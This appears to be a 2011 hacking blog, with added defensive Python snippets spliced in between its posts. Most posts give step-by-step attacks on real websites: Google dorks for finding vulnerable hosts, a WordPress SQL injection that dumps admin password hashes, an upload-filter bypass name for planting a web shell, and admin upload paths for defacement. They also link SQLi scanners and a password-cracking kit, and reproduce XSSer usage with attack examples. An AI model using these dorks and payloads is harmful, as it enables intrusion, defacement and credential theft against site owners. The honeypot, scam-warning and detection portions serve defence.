Thursday, November 17, 2011

phpmyadmin exploit




Dork : allinurl:index.php?db=information_schema


Enter the above dork in Google; it shows more than 161,000 results,
sites that are vulnerable through this dork.


This dork bypasses the admin username and password and takes you directly to the information_schema tables to get data, and you can delete data too ......

Tuesday, November 15, 2011

WordPress Exploit

WordPress exploit: "/easy-comment-uploads/upload-form.php".

Find sites with this dork:

Dork : "/easy-comment-uploads/upload-form.php"


*|_Exploit_|*

http://[localhost]/[path]/easy-comment-uploads/upload-form.php
http://[localhost]/easy-comment-uploads/upload-form.php

For example:

File extensions: [.txt], [.jpg], [.gif], [.bmp]


Preview your upload page.
In my case I uploaded hitcher1.jpg

site/wp-content/uploads/[years]/[month]/[yourshell]
example: site/wp-content/uploads/2011/06/404.php;.txt

Examples of hacked links:

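As an added example (my code, not the post's or the plugin's), here is the upload check that would have stopped the file name shown above: a naive last-extension check beside a hardened one that whitelists the form's four extensions, rejects names with more than one dot or any path component, checks the file header against the claimed type, and lets the server choose the stored name. The constants and helper names are assumptions for this example.

```python
import os
import re
import secrets

# Extensions the upload form in the post accepts
ALLOWED = {"txt", "jpg", "gif", "bmp"}

def naive_is_allowed(filename):
    # Insecure check, kept for contrast: it trusts whatever follows the last dot,
    # so "404.php;.txt" passes because the name ends in ".txt"
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED

# Hardened rule: one plain base name, exactly one dot, a whitelisted extension
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(txt|jpg|gif|bmp)$", re.I)

def hardened_is_allowed(filename):
    # Anything with a directory component is rejected before the name is checked
    if os.path.basename(filename.replace("\\", "/")) != filename:
        return False
    return SAFE_NAME.match(filename) is not None

# Magic-byte prefixes for the binary formats; txt is checked separately
MAGIC = {"jpg": (b"\xff\xd8\xff",), "gif": (b"GIF87a", b"GIF89a"), "bmp": (b"BM",)}

def content_matches(data, ext):
    # Does the file body look like the format its extension claims?
    ext = ext.lower()
    if ext in MAGIC:
        return data.startswith(MAGIC[ext])
    if ext == "txt":
        try:
            text = data.decode("utf-8")
        except UnicodeDecodeError:
            return False
        return "<?" not in text  # a text upload has no business carrying a PHP open tag
    return False

def stored_name(ext):
    # The server, not the uploader, picks the name that lands under wp-content/uploads
    return f"{secrets.token_hex(8)}.{ext.lower()}"

def accept_upload(filename, data):
    # Returns the name to store the file under, or None when the upload is rejected
    if not hardened_is_allowed(filename):
        return None
    ext = filename.rsplit(".", 1)[1]
    if not content_matches(data, ext):
        return None
    return stored_name(ext)
```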


Monday, November 14, 2011

WordPress Blog Exploit

First of all, use a Google dork to find such sites


Dork: inurl:"fbconnect_action=myhome"

[Image: untitled24.JPG]

You will get admin info like this on the page

[Image: untitled22.JPG]

Just change this part of URL :
?fbconnect_action=myhome&userid=

With This part of URL :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z​0mbyak,7,8,9,10,11,12+from+wp_users--

[Image: untitled23.JPG]

Now you will get the username and password of the admin

Then just run the password hash through any MD5 cracker
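An added detection example, not from the post: it scans constructed web-server access-log lines for the UNION-based read of wp_users shown above, after decoding '+' and %xx so that encoded variants of the same payload still match. The log lines, IP addresses and rule names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page): one ordinary request and two
# attempts to pull user_login/user_pass out of wp_users through the vulnerable parameter
SAMPLE_LOG = """\
203.0.113.5 - - [14/Nov/2011:10:01:22 +0000] "GET /?fbconnect_action=myhome&userid=1 HTTP/1.1" 200 5120
203.0.113.9 - - [14/Nov/2011:10:02:03 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,concat(user_login,0x3a,user_pass),4+from+wp_users-- HTTP/1.1" 200 6110
198.51.100.7 - - [14/Nov/2011:10:03:41 +0000] "GET /?fbconnect_action=myhome&fbuserid=1%20UNION%20SELECT%20user_pass%20FROM%20wp_users HTTP/1.1" 200 6001
"""

# Common log format: client ip, timestamp, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Signatures for UNION-based reads of the WordPress users table
RULES = {
    "union_select": re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I),
    "wp_users_read": re.compile(r"\bfrom\b[\s/*]+wp_users\b", re.I),
    "cred_concat": re.compile(r"concat\s*\([^)]*user_pass", re.I),
}

def normalise(query):
    # Undo '+' and %xx encoding until stable, so encoded variants of one payload match
    prev, cur = None, query
    while cur != prev:
        prev, cur = cur, unquote_plus(cur)
    return cur

def inspect_line(line):
    # Parse one log line; returns a record with the matched rule names, or None if unparsable
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    path, _, query = target.partition("?")
    hits = [name for name, rx in RULES.items() if rx.search(normalise(query))]
    return {"ip": ip, "time": ts, "method": method, "path": path,
            "status": int(status), "hits": hits}

def scan(log_text):
    # Return only the records that tripped at least one rule
    return [r for r in (inspect_line(l) for l in log_text.splitlines()) if r and r["hits"]]
```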





Friday, November 4, 2011

Rte Remote File Upload Vulnerability

The RTE remote file upload vulnerability is found on many sites.

To find which sites are vulnerable, use the following Google dorks:

inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/


These are the exploit paths:

  • siteexample.com/rte/RTE_popup_file_atch.asp

  • siteexample.com/admin/RTE_popup_file_atch.asp

Hacking a site, for example:


Remove /index_new.asp from it and put the exploit link in its place, like

Now you will get the admin control area, where you can upload your deface page and, in some cases, your shell too, like this


Hacked link

Mirror


Saturday, October 22, 2011

Online SQLi Scanners


http://scanner.drie88.tk/

http://wolfscps.com/gscanner.php
http://cattuong.net/
http://www.sunmagazin.com/tools/hack/SQLI-Scan/
http://www.be007.gigfa.com/scanner/scanner.php
http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/

Password Breaking Tools 2011 Link Updated

Using this password hacking kit you will be able to crack a lot of passwords: Windows admin passwords, PDF passwords, zip file passwords, document passwords, RAR passwords and much more.


The following password breaking tools are included:
1. PDF Password Remover
2. Windows XP Admin Password Remover
3. Zip File Password Cracker
4. SQL Password Remover
5. Microsoft Office Password Remover
6. Microsoft Windows Vista Password Remover
7. Rar File Password Cracker
8. Windows Password Recovery Kit
9. Password Changer
10. Distributed File Password Recovery
and much more
Download link: click here

Sunday, September 4, 2011

Automatic Tool Pentesting XSS Attacks


Introduction

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.

It contains several options for trying to bypass certain filters, and various special code injection techniques.

Usage

xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options:

--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface

*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:

--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded

*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:

-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls
--De=DORK_ENGINE Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler, ask, etc.
See dork.py file to check for available engines)

*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.

-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)

*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:

--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--retries=RETRIES Retries when the connection timeouts (default 3)

*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:

--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file

*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:

--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')

*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select multiple:

--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)

*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:

--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code):

--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code

*Miscellaneous*:

--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered

Examples

If you have interesting examples of usage about XSSer, please send an email to the mailing list.

-------------------
* Simple injection from URL:

$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using character encoding mutations (first, change the payload to hexadecimal; second, change the first encoding to String.fromCharCode; third, re-encode the second encoding to hexadecimal), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):

$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
-------------------
* Advanced injection from File, using your -own- payload and Unescape() character encoding to bypass filters:

$ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
-------------------
* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:

$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sent with GET, using automatic payloading, with IP Octal payload obfuscation and printing results as a "tinyurl" shortened link (ready to share!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
-------------------
* Simple injection from URL, using GET, and trying to generate from the results a "malicious" shortened link (is.gd) with a valid DoS (Denial of Service) browser client payload:

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing the delay between requests to 10 seconds, injecting parameters in HTTP User-Agent, HTTP Referer and Cookie parameters, using the Tor proxy, with IP Octal obfuscation, with statistics results, in verbose mode and creating shortened links (tinyurl) of any valid injecting payloads found (real playing mode!):

$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.

$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
(federated XSS pentesting botnet)

$ python xsser.py -d "login.php" --De "duck" --publish

* Examples online:

- http://identi.ca/xsserbot01
- http://twitter.com/xsserbot01
-------------------
* Create a .swf movie with XSS code injected

$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results

$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from URL, including DCP injections and exploiting our "own" code, spoofed in a shortened link, on positive results found. XSS real-time exploiting.

$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.

$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly

$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

Screenshots: [Images: xsser_core_report, xsser_dcp_sm, xsser_finalcode, xsser_gtk3, xsser_help]



Download: http://xsser.sourceforge.net/#download

HONEY POT Trap Hackers

What is a honeypot?
In layman's terms, it is a trap set by administrators for hackers, to fool them into believing that they are hacking into the admin's system, while in fact the hackers are the ones getting hacked by the admin.

How does this work?
It works by presenting the hacker with a false scenario: the hacker thinks he is penetrating the system, but in fact he is going nowhere and is merely playing in a world created by the admins. By doing so, admins are able to observe all the malicious activity of the hackers: which ports they try to connect to, what files they try to upload, which sections they try to access.

A honeypot is mainly designed to trap hackers, or to present them with a virtual system that does not really exist.

Technically, the honeypot listens on all the ports of the system. Whenever a hacker port-scans the system, he gets a list of ports that he thinks are open, but they are actually ports opened by the honeypot behind the firewall; so whenever the hacker tries to access some random port, say 100, he is talking to the honeypot, not the real system.

The above scenario can be visualised better like this: install VMware on a system, run some old version of Windows or Linux in it with all ports open, and forward those ports from the host system. Whenever a hacker tries to fingerprint or port-scan, he gets information about the VM, not the host; he may be able to penetrate the VM's OS, but the host OS remains safe.

But doing the above job by hand is difficult, so special applications called honeypots are created to do it, along with many other jobs like tracking packets, file access, etc.

There are mainly 3 types of honeypots available:
1. Small: mainly keeps a log of the IP addresses trying to access your system, along with the port.
2. Medium: its functionality is a little more advanced, keeping track of files accessed, time periods, hosts, etc.
3. Large: provides all the functionality, but the main feature of this kind of honeypot is security; they can simulate a virtual OS for outsiders or hackers very well.

In this article I am going to give the example of a small-scale honeypot for Windows.
Honeypots are available both commercially and as open source; I am taking the example of KFSensor, which is freely available here.
STEP 1: Download KFSensor and WinPcap from their websites and install them.
STEP 2: Restart your system and start the WinPcap server from the folder where it was saved, usually on the C:\ drive.
STEP 3: Start KFSensor and do as prompted in the window; this is mainly for configuring your new honeypot.
STEP 4: Done. Keep your system up for packet scanning.

[Image: untitled]

In the above picture you can see that some port numbers are struck out. That is because you need to restart the system, then start your honeypot, and only then the internet connection; otherwise these ports are taken by the network connection first, the honeypot cannot bind them, and no information gathering is possible on them.

We can also create our own small honeypot whose main function is to check for incoming packets.
It is nothing but a basic client-server program which listens on all ports.

[Image: untitled (1)]


Within minutes of installing this small honeypot I got the scanning alert sound; when checked, these were mainly UDP packets left over the internet for scanning of hosts........
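As an added example of the small "listen on ports and log who knocks" honeypot the post describes (my code, not KFSensor's or the post's): it binds several TCP decoy ports at once, records source IP, source port, target port and time for every connection, and closes the connection without offering a service. The port numbers and the self_test helper are assumptions for this example; UDP probes, which the author mentions, are not covered.

```python
import selectors
import socket
import threading
import time
from collections import namedtuple
from datetime import datetime, timezone

# One record per connection attempt: when, who, from which source port, to which of ours
Event = namedtuple("Event", "time peer_ip peer_port local_port")

def make_listener(port, host="0.0.0.0"):
    # Bind one non-blocking TCP socket; port 0 lets the OS choose (used by self_test)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(16)
    s.setblocking(False)
    return s

def serve(listeners, log, stop, poll=0.1):
    # Watch every listener at once; each accepted connection is logged and closed
    # straight away, so a scanner sees an open port but gets no service behind it
    sel = selectors.DefaultSelector()
    for s in listeners:
        sel.register(s, selectors.EVENT_READ)
    while not stop.is_set():
        for key, _ in sel.select(poll):
            try:
                conn, (ip, port) = key.fileobj.accept()
            except OSError:
                continue
            log.append(Event(datetime.now(timezone.utc), ip, port,
                             key.fileobj.getsockname()[1]))
            conn.close()
    sel.close()
    for s in listeners:
        s.close()

def run_honeypot(ports, host="0.0.0.0"):
    # Start the listener thread; returns the shared log, a stop flag, the thread, bound ports
    listeners = [make_listener(p, host) for p in ports]
    bound = [s.getsockname()[1] for s in listeners]
    log, stop = [], threading.Event()
    t = threading.Thread(target=serve, args=(listeners, log, stop), daemon=True)
    t.start()
    return log, stop, t, bound

def self_test():
    # Constructed local probe: two OS-chosen loopback ports, one connection to each;
    # returns the recorded events and the ports that were bound
    log, stop, t, ports = run_honeypot([0, 0], host="127.0.0.1")
    for p in ports:
        socket.create_connection(("127.0.0.1", p), timeout=2).close()
    deadline = time.time() + 3
    while len(log) < len(ports) and time.time() < deadline:
        time.sleep(0.05)
    stop.set()
    t.join(2)
    return log, ports
```

For a real decoy, call run_honeypot with unprivileged ports such as [2121, 2323, 8080] and print the log entries as they arrive; self_test() shows the whole cycle on loopback.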

Sunday, August 28, 2011

Hack Website Through Exploit of Xpoll Admin

First of all, open

http://google.com

Then type "xpoll admin"
in the search bar.

After hitting search you will see many sites found by Google.
Now open the sites and you will get an open admin image upload area where you can upload your
deface page / shell, or load your image.

Once you upload your deface page,
remove /admin from the URL and, after images/, type your deface page name, like hitcher101.html in my case.

Demo

Enjoy it



Saturday, August 20, 2011

Save your Facebook account from Malicious script scam

First of all, what is a malicious script scam?

In a malicious script scam you are asked to copy and paste text into your browser's address bar in order to see something interesting or surprising, for example who viewed your profile.


This "code" is actually a malicious script. Instead of showing you what was advertised, it uses your account to create events and pages and send your friends spam.

Stay Safe

Spammers often advertise surprising things (ex: the opportunity to see who viewed your profile) to try to lure people into their spam traps.
  • Never click on suspicious links, even if they’re sent by your friends.
  • Never copy and paste text into your internet browser address bar if you are unsure of what it is.